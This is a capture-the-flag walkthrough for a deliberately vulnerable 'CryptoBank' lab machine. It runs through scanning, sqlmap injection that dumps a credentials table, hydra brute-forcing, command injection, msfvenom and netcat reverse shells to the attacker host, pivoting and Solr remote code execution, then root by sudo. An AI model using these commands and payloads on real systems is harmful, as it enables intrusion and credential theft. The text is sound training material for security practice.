💱Crypto Bank

Welcome to CryptoBank, the best Crypto platform to store and trade your crypto assets, join now! Our platform uses advanced technology to protect your assets. Our experienced engineers have taken extra measures to keep our infrastructure secure.

Goal: Hack the CryptoBank in order to reach their cold Bitcoin wallet (root flag)

1. Reconnaissance

Scanning the network to find vulnerable machine's IP

arp-scan -l                                                     
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:02:ad:e6, IPv4: 192.168.10.22
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1	52:54:00:12:35:00	QEMU
192.168.10.2	52:54:00:12:35:00	QEMU
192.168.10.3	08:00:27:4b:43:c3	PCS Systemtechnik GmbH
192.168.10.24	08:00:27:26:22:ed	PCS Systemtechnik GmbH

We find the IP of the vulnerable machine to be 192.168.10.24
Adding the hostname cryptobank.local (which can be found out by accessing the webpage and proceeding to the secure login page which shows an error as the host name was not resolved) to the /etc/hosts file for resolving the IP address

2. Scanning

2.1 Nmap

Using nmap to find the open ports and their services

nmap -sV -Pn -p- -A -oA nmap/inital 192.168.10.24  

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-12 09:49 IST
Nmap scan report for 192.168.10.24
Host is up (0.040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f:4e:59:df:b7:55:49:cf:d3:12:2d:19:01:05:43:f7 (RSA)
|   256 5e:1b:37:98:ab:c7:e6:ee:5f:f8:df:43:14:de:28:4e (ECDSA)
|_  256 8e:a9:90:9f:6e:51:b1:c7:26:ea:07:ac:69:28:b3:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: CryptoBank
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:26:22:ED (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   39.51 ms 192.168.10.24

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.50 seconds

We find tcp ports 22 and 80 open with ssh and Apache running respectively.

`:80`

It contains a webpage for a crypto application

2.2 Directory Enumeration

Using gobuster to brute-force directories

gobuster dir -u http://192.168.10.24 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt 

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.24
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/12 10:01:33 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 315] [--> http://192.168.10.24/assets/]
/development          (Status: 401) [Size: 460]                                   
/trade                (Status: 301) [Size: 314] [--> http://192.168.10.24/trade/] 
/server-status        (Status: 403) [Size: 278]                                   
                                                                                  
===============================================================
2022/04/12 10:02:34 Finished
===============================================================

We find some interesting directories

`/development`

In order to access this page, we need to be authenticated

`/trade`

We see a login page for a trading platform

2.3 Vulnerability scanning

Using nikto to scan for any vulnerable or exposed critical information

nikto -url http://192.168.10.24
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.10.24
+ Target Hostname:    192.168.10.24
+ Target Port:        80
+ Start Time:         2022-04-12 10:00:49 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 82f7, size: 5a30acd90b6ab, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnakes list (https://gist.github.com/mubix/5d269c686584875015a2)
+ 8260 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2022-04-12 10:03:19 (GMT5.5) (150 seconds)
---------------------------------------------------------------------------

We find a info.php page which contains the details about the php version used, which is always good to know.

2.4 SQL injection vulnerability

We can use burpsuite pro to crawl and scan cryptobank.local/trade to find any vulnerabilities

We find out that the login page is vulnerable to SQL Injection
We need to capture the login request in burpsuite and save it as a text file request.txt for later enumerations using sqlmap

2.5 Credential dumping

Since we found out that cryptobank.local/trade is vulnerable to SQL Injection, we can use sql map to dump out potential credentials
Getting the database names:

sqlmap -r request.txt --dbs --batch                                                                                         

[*] starting @ 10:35:58 /2022-04-12/
---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:36:33] [INFO] the back-end DBMS is MySQL
[10:36:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:36:33] [INFO] fetching database names
[10:36:33] [INFO] fetching number of databases
[10:36:33] [INFO] retrieved: 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
5
[10:36:44] [INFO] retrieved: 
[10:36:49] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[10:37:52] [INFO] retrieved: cryptobank
[10:38:29] [INFO] retrieved: mysql
[10:38:47] [INFO] retrieved: performanceU
[10:39:31] [INFO] retrieved: 
[10:39:31] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
available databases [4]:
[*] cryptobank
[*] information_schema
[*] mysql
[*] performanceU

We get 4 databases cryptobank, information_schema, mysql and performanceU
Out of these the most interesting and potential database for credentials is cryptobank
Dumping the tables in cryptobank:

sqlmap -r request.txt -D cryptobank --tables --batch 

---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:41:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:41:43] [INFO] fetching tables for database: 'cryptobank'
[10:41:43] [INFO] fetching number of tables for database 'cryptobank'
[10:41:43] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                               
[10:41:45] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:42:00] [INFO] adjusting time delay to 1 second due to good response times
3
[10:42:00] [INFO] retrieved: accounts
[10:42:29] [INFO] retrieved: comments
[10:42:57] [INFO] retrieved: loans
Database: cryptobank
[3 tables]
+----------+
| accounts |
| comments |
| loans    |
+----------+

We get tablenames of accounts, comments and loans , out of which accounts might carry potential credentials
Getting the columns from the table accounts

sqlmap -r request.txt -T accounts -D cryptobank --columns --batch 

Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:45:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:45:16] [INFO] fetching columns for table 'accounts' in database 'cryptobank'
[10:45:16] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                               
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
===================================================================================
Database: cryptobank
Table: accounts
[4 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| balance    | int(11)      |
| id_account | int(11)      |
| password   | varchar(100) |
| username   | varchar(50)  |
+------------+--------------+

We get 4 columns : balance, id_account, password and username
Dumping the data from columns username and password

sqlmap -r request.txt -T accounts -D cryptobank -C username,password --dump                                              4m 12s root@j0zack

---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:51:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:51:04] [INFO] fetching entries of column(s) 'password,username' for table 'accounts' in database 'cryptobank'
[10:51:04] [INFO] fetching number of column(s) 'password,username' entries for table 'accounts' in database 'cryptobank'
[10:51:04] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                               
[10:51:06] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1

===================================================================================
Database: cryptobank
Table: accounts
[12 entries]
+--------------------+------------+
| username           | password   |
+--------------------+------------+
| spongebob          | 3mwZd896Me |
| bill.w             | 3Nrc2FYJMe |
| deadbeef           | 6X7DnLF5pG |
| dreadpirateroberts | 7HwAEChFP9 |
| notanirsagent      | 8hPx2Zqn4b |
| williamdelisle     | gFG7pqE5cn |
| buzzlightyear      | LnBHvEhmw3 |
| mrbitcoin          | LxZjkK87nu |
| johndl33t          | NqRF4W85yf |
| juliusthedeveloper | wJWm4CgV26 |
| patric             | x8CRvHqgPp |
| tim                | zm2gBcaxd3 |
+--------------------+------------+

Saving the usernames and password in files users.txt and passwords.txt respectively
On further exploration of the webpage cryptobank.local, we get more potential usernames from under the core team by clicking on the email icon below the team members. Adding these to users.txt too.

Using hydra and the obtained credentials to brute-force the /development login portal.

hydra -L users.txt -P passwords.txt http-get://192.168.10.24/development                                                 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-12 11:01:29
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:4/p:1), ~1 try per task
[DATA] attacking http-get://192.168.10.24:80/development
[80][http-get] host: 192.168.10.24   login: julius.b   password: wJWm4CgV26
1 of 1 target successfully completed, 1 valid password found

We get the credentials julius.b : wJWm4CgV26

2.7 Recursive directory scanning

We can use dirb to recursively find any directories under /development. Since it requires authentication, we need to pass in the credentials along with it.

dirb http://192.168.10.24/development -u julius.b:wJWm4CgV26 /usr/share/wordlists/dirb/common.txt -w 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Apr 12 19:10:29 2022
URL_BASE: http://192.168.10.24/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
AUTHORIZATION: julius.b:wJWm4CgV26
OPTION: Not Stopping on warning messages

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.10.24/development/ ----
==> DIRECTORY: http://192.168.10.24/development/backups/                                                                              
+ http://192.168.10.24/development/index.html (CODE:200|SIZE:21)                                                                      
+ http://192.168.10.24/development/php.ini (CODE:200|SIZE:109)                                                                        
==> DIRECTORY: http://192.168.10.24/development/tools/                                                                                
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
+ http://192.168.10.24/development/backups/.htaccess (CODE:200|SIZE:12)                                                               
==> DIRECTORY: http://192.168.10.24/development/backups/home/                                                                         
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/tools/ ----
+ http://192.168.10.24/development/tools/index.php (CODE:403|SIZE:688)                                                                
==> DIRECTORY: http://192.168.10.24/development/tools/Resources/                                                                      
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/backups/home/ ----
+ http://192.168.10.24/development/backups/home/.git/HEAD (CODE:200|SIZE:23)                                                          
+ http://192.168.10.24/development/backups/home/.htaccess (CODE:200|SIZE:12)                                                          
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/                                                                  
==> DIRECTORY: http://192.168.10.24/development/backups/home/development/                                                             
+ http://192.168.10.24/development/backups/home/index.html (CODE:200|SIZE:33603)                                                      
==> DIRECTORY: http://192.168.10.24/development/backups/home/trade/                                                                   
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/tools/Resources/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/backups/home/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/css/                                                              
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/fonts/                                                            
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/img/                                                              
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/js/                                                               
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/backups/home/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
+ http://192.168.10.24/development/backups/home/development/.htaccess (CODE:200|SIZE:154)                                             
+ http://192.168.10.24/development/backups/home/development/php.ini (CODE:200|SIZE:109)                                               
==> DIRECTORY: http://192.168.10.24/development/backups/home/development/tools/                                                       
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/backups/home/trade/ ----
+ http://192.168.10.24/development/backups/home/trade/index.php (CODE:403|SIZE:688)                                                   
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/backups/home/assets/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/backups/home/assets/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/backups/home/assets/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/backups/home/assets/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/backups/home/development/tools/ ----
+ http://192.168.10.24/development/backups/home/development/tools/index.php (CODE:403|SIZE:688)                                       
==> DIRECTORY: http://192.168.10.24/development/backups/home/development/tools/Resources/                                             
                                                                                                                                      
---- Entering directory: http://192.168.10.24/development/backups/home/development/tools/Resources/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               sources/zt                                             
-----------------
END_TIME: Tue Apr 12 19:12:35 2022
DOWNLOADED: 64568 - FOUND: 11

Reading out the contents of development/backups/home/development/php.ini, we can see that there is a firewall called NinjaFirewall active, which might block out potential reverse shell uploads. We need to find some way to execute commands directly.
We get a directory called .git under /development/backups/home which could be a copy of the git repository and might contain potential vectors.

2.8 Rebuiding git

GitHack is a tool used to dump the contents of a .git folder by rebuilding it and preserving the directory structure
Cloning it from its GitHub repository and executing the command with the /.git path specified

git clone https://github.com/lijiejie/GitHack                         
cd GitHack
python3 GitHack.py http://192.168.10.24/development/backups/home/.git/

Searching for any interesting files in the git folder

ls                                                                                                         
192.168.10.24  GitHack.py  index  lib  README.md

cd 192.168.10.24  
ls                                                                                              
assets  closed.html  development  dev-notes.txt  index.html  index.js  ninjacheck.php  ninjafirewall  style.css  trade

cd development                                                                                  
ls                                                                                                
php.ini  tools

cd tools                                                                                            
ls                                                                                                  
CommandExecution  FileInclusion  FileUpload  homepage.html  index.php  Resources

cd CommandExecution                                                                                  ls                                                                                                     
commandexec.html  CommandExec.php

We get a file named CommandExec.php which contains the login configuration

cat CommandExec.php                                                                                    
<html>
  <head>
    
    <title>CommandExec-1</title>
  </head>
  <body>
    <div style="background-color:#afafaf;padding:15px;border-radius:20px 20px 0px 0px">
      <button type="button" name="homeButton" onclick="location.href='../homepage.html';">Home Page</button>
      <button type="button" name="mainButton" onclick="location.href='commandexec.html';">Main Page</button>
    </div>
    <div style="background-color:#c9c9c9;padding:20px;">
      <h1 align="center">Auth to execute system command</h1>
    <form align="center" action="CommandExec.php" method="$_GET">
      <label align="center">Username:</label><br>
      <input align="center" type="text" name="username" value=""><br>
      <label>Password:</label><br>
      <input align="center" type="password" name="password" value=""><br>
    <input align="center" type="submit" value="Submit">

    </form>
  </div>
  <div style="background-color:#ecf2d0;padding:20px;border-radius:0px 0px 20px 20px" align="center">
    <?php
    if(isset($_GET["username"])){
      //echo shell_exec($_GET["username"]);
      if($_GET["password"] == "wJWm4CgV26")
        echo shell_exec($_GET["username"]);
    }

    ?>
  </div>
  </body>
</html>

As we can see from the above code, the username field in the /development/tools/CommandExecution/CommandExec.php is vulnerable to command injection when validated with the same password, wJWm4CgV26

3. Initial Foothold

Navigating to the homepage of /tools(http://cryptobank.local/development/tools/homepage.html), we can see three useful sections.

Since there is a firewall sitting in front of the network, the most probable way of getting a reverse shell would be command execution.We proceed with Execute a command

Using Run system command option
Testing the vulnerability by inputting ls(or any other command with a visible output) in the username field and the password wJWm4CgV26

We find that we can execute commands in the Username field

3.1 Crafting payload

Crafting a bash reverse shell using msfvenom and the payload cmd/unix/reverse_bash and saving it as reverse.sh

msfvenom -p cmd/unix/reverse_bash LHOST=HOSTIP LPORT=4444 R> reverse.sh      

[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 77 bytes

Hosting the payload localy using a python server

python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Uploading the payload to the target by wget http://HOSTIP:8000/reverse.sh in the Username field

3.2 Reverse shell

Firing up msfconsole and setting the module to exploit/multi/handler to capture our reverse shell.
Setting the payload to cmd/unix/reverse_bash the same one which we used to craft the payload with msfvenom
Changing the LHOST and LPORT (default is 4444) and running it

msfconsole                                                                                                                                                                       

[msf](Jobs:0 Agents:0) >> use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LHOST eth0
LHOST => eth0
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run

[*] Started reverse TCP handler on 192.168.10.22:4444

Since we already uploaded the payload to the target, we need to run it.
Executing the payload by running bash reverse.sh

We get an open metasploit command shell.

[*] Command shell session 1 opened (192.168.10.22:4444 -> 192.168.10.24:50118 ) at 2022-04-13 10:21:54 +0530

whoami
www-data

We are the user www-data
Backgrounding our session using Ctrl + Z to session 1
Stabilizing the shell to a meterpreter shell by using sessions -u 1
Getting a meterpreter stable shell on session 2, using it by sessions -i 2

^Z
Background session 1? [y/N]  y
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> sessions -u 1

[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.10.22:4433 
[*] Sending stage (989032 bytes) to 192.168.10.24
[*] Meterpreter session 2 opened (192.168.10.22:4433 -> 192.168.10.24:57458 ) at 2022-04-13 10:22:20 +0530
[*] Command stager progress: 100.00% (773/773 bytes)

[msf](Jobs:0 Agents:2) exploit(multi/handler) >> sessions

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  1         shell cmd/unix                                   192.168.10.22:4444 -> 192.168.10.24:50118  (192.168.10.24)
  2         meterpreter x86/linux  www-data @ 192.168.10.24  192.168.10.22:4433 -> 192.168.10.24:57458  (192.168.10.24)

[msf](Jobs:0 Agents:2) exploit(multi/handler) >> sessions -i 2
[*] Starting interaction with 2...

(Meterpreter 2)(/var/www/cryptobank/development/tools/CommandExecution) >

4. Pivoting

After gaining the meterpreter session, we can run netstat to discover any other connections to the application.

(Meterpreter 2) > netstat -antp

Connection list
===============

    Proto  Local address            Remote address              State        User  Inode  PID/Program name
    -----  -------------            --------------              -----        ----  -----  ----------------
    tcp    127.0.0.53:53            0.0.0.0:*                   LISTEN       101   0
    tcp    0.0.0.0:22               0.0.0.0:*                   LISTEN       0     0
    tcp    172.17.0.1:8983          0.0.0.0:*                   LISTEN       0     0
    tcp    127.0.0.1:3306           0.0.0.0:*                   LISTEN       111   0
    tcp    192.168.10.24:50118      192.168.10.22:4444          ESTABLISHED  33    0
    tcp    192.168.10.24:57458      192.168.10.22:4433          ESTABLISHED  33    0
    tcp    :::22                    :::*                        LISTEN       0     0
    tcp    :::80                    :::*                        LISTEN       0     0
    tcp    ::ffff:192.168.10.24:80  ::ffff:192.168.10.22:52682  ESTABLISHED  33    0
    udp    127.0.0.53:53            0.0.0.0:*                                101   0
    udp    192.168.10.24:68         0.0.0.0:*                                100   0
    udp    0.0.0.0:5353             0.0.0.0:*                                0     0
    udp    :::5353                  :::*                                     0     0

We find a service/application running on 172.17.0.1:8983
We can bind it to our localhost using port forwardingg.(binding it to port 8983)

(Meterpreter 2) > portfwd add -l 8983 -p 8983 -r 172.17.0.1

[*] Local TCP relay created: :8983 <-> 172.17.0.1:8983

Accessing the application via the browser (localhost:8983)

We see that it is running Apache Solar which is an open-source enterprise search platform, running an outdated version (8.1.1)

4.1 Remote Code Execution

Using searchsploit (in another terminal tab) to search for potential exploits of solr

searchsploit solr

------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache Solr - Remote Code Execution via Velocity Template (Metasploit)                                                                                      | multiple/remote/48338.rb
Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution                                                                                   | xml/webapps/43009.txt
Apache Solr 8.2.0 - Remote Code Execution                                                                                                                   | java/webapps/47572.py
Solr 3.5.0 - Arbitrary Data Deletion                                                                                                                        | java/webapps/39418.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------ ------------------------------

We find an RCE for Apache Solr 8.2.0, which can be used here
Moving the module to our current directory

searchsploit -m 47572                                                    

  Exploit: Apache Solr 8.2.0 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47572
     Path: /opt/exploitdb/exploits/java/webapps/47572.py
File Type: Python script, ASCII text executable

Copied to: ./47572.py

Uploading the exploit 47572.py to the /tmp directory of the target using the meterpreter session

(Meterpreter 2) > cd /tmp

(Meterpreter 2)(/tmp) > upload 47572.py

[*] uploading  : ~/cryptobank/47572.py -> 47572.py
[*] Uploaded -1.00 B of 6.37 KiB (-0.02%): ~/cryptobank/47572.py -> 47572.py
[*] uploaded   : ~/cryptobank/47572.py -> 47572.py

(Meterpreter 2)(/tmp) > ls
Listing: /tmp
=============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  6520  fil   2022-04-13 11:05:55 +0530  47572.py

Spawning and stabilizing a bash shell

(Meterpreter 2)(/tmp) > shell
Process 28004 created.
Channel 15 created.

python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cryptobank:/tmp$

Starting a netcat listener in port 7777 in a new terminal window

nc -lvnp 7777                                                                                                            
listening on [any] 7777 ...

Executing the exploit with the proper syntax provided with the IP address and port from which Apache solar service is running and using netcat for a reverse connection

www-data@cryptobank:/tmp$ python3 47572.py 172.17.0.1 8983 "nc -e /bin/bash 192.168.10.22 7777"

<72.17.0.1 8983 "nc -e /bin/bash 192.168.10.22 7777"
OS Realese: Linux, OS Version: 4.15.0-175-generic
if remote exec failed, you should change your command with right os platform

Init node cryptobank Successfully, exec command=nc -e /bin/bash 192.168.10.22 7777
RCE failed @Apache Solr node cryptobank

www-data@cryptobank:/tmp$

We get a connection to our listener; stabilizing the shell.

#nc -lvnp 7777                                                                                                            
#listening on [any] 7777 ...

connect to [192.168.10.22] from (UNKNOWN) [192.168.10.24] 44906

python -c 'import pty;pty.spawn("/bin/bash")'
solr@33fa86e6105f:/opt/solr/server$

5. Privilege Escalation

Using sudo -l, we find out that user solr can run all commands as root

solr@33fa86e6105f:/opt/solr/server$ sudo -l
Matching Defaults entries for solr on 33fa86e6105f:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User solr may run the following commands on 33fa86e6105f:
    (ALL) NOPASSWD: ALL
    (ALL : ALL) ALL

Escalating the privilege (using the default password of solr) and getting the flag.txt located at /root

solr@33fa86e6105f:/opt/solr/server$ sudo su
[sudo] password for solr: solr

root@33fa86e6105f:/opt/solr-8.1.1/server cd /root

root@33fa86e6105f:~ cat flag.txt

PreviousColddbox NextGoldenEye

Last updated 3 years ago